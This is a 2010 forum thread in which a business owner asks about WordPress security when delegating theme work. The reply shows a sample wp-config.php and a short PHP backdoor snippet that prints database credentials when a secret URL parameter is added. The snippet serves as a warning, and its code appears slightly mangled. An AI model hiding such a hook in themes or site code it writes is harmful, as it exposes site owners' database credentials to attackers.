Results 1 to 2 of 2

Thread: Word Press General question about Security

  1. 06 Jul 2010, 09:34 AM #1
    Keybler
    Keybler is offline Newbie
    Join Date
    Jun 2010
    Posts
    3

    Word Press General question about Security

    Hi,

    I have finally given in and installed a Word Press blog for our company.

    I really do not have the hours it takes to learn it all so I would like to have a new employee that is really tech savy and good with WP to design the theme and install addons.

    My question is about security, since I am unfamiliar with WP, I wondered if there is anyway for him to do certain things without having complete control. Or even if he does, I would make it for a short time then change the main admin password.

    Any advice for this blog newbie from someone more experinced with this situtation.

    Thanks in advance
    Keybler
    Reply With Quote Reply With Quote
  2. 06 Jul 2010, 05:12 PM #2
    <CrGeary.com/>'s Avatar
    <CrGeary.com/>
    <CrGeary.com/> is offline Computer Geek :O
    Join Date
    Mar 2010
    Location
    England
    Posts
    1,144
    Hey, I was thinking about this the other day. About how NOT safe it is for people to use WordPress themes without knowledge of PHP. I'm not sure if you know anything about PHP or any other coding languages, so ill just give you an example:

    WordPress, like pretty much every database driven website has a configuration file WordPress's file is located at: http://www.example.com/wp-config.php ( assuming you installed it to the root of your website ) inside it (once you have installed it) it will contain your username/password etc for your database, this is my configuration file ( its for my local server so it does'nt matter if you see it:

    PHP Code:
    // ** MySQL settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define('DB_NAME''sandbox');

    /** MySQL database username */
    define('DB_USER''root');

    /** MySQL database password */
    define('DB_PASSWORD''');

    /** MySQL hostname */
    define('DB_HOST''localhost'); 
    Now, where am i going with this? Well, if you give him access to your website via FTP ( which there is no reason why you should need to ), then he can look at the contents of the file.

    Another thing, which is my main point, and my biggest concern would be this, if I added this code to any wordpress theme ( i would have to have access to the source files of the theme ( aka the theme builder ):

    PHP Code:
    if( isset($_GET['hidden_fact']) ){
          echo     DB_USER '<br/>';
          echo     DB_PASSWORD '<br/>';
          echo     DB_HOST '<br/>';
          echo     DB_USER '<br/>';
    Then if you went to your website: http://www.example.com/ then it looks fine, you have your new theme looks great, works great. But when the theme creator comes along, and does this: http://www.example.com/?hidden_fact then he/she gets your database information.

    There are loads of similar things he/she could do, which is why i think if your going to use wordpress themes, then you should know basic PHP or basic Programming.


    Sorry for the long post, but i felt its important you knew about the wp-config.php file aswell as the little trick.
    CrGeary [Web Development] :: Way2Adv [3D Modelling]
    -- -- --
    esM! [Flash Games]
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Similar Threads

  1. General Question on Site Templating/MVC design
    By Faithful in forum General Questions
    Replies: 0
    Last Post: 07 Jan 2010, 09:02 AM
  2. Question about a custom search for my site...Not word search though
    By jpf566 in forum Web Design, HTML Reference and CSS
    Replies: 1
    Last Post: 28 Aug 2008, 03:35 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules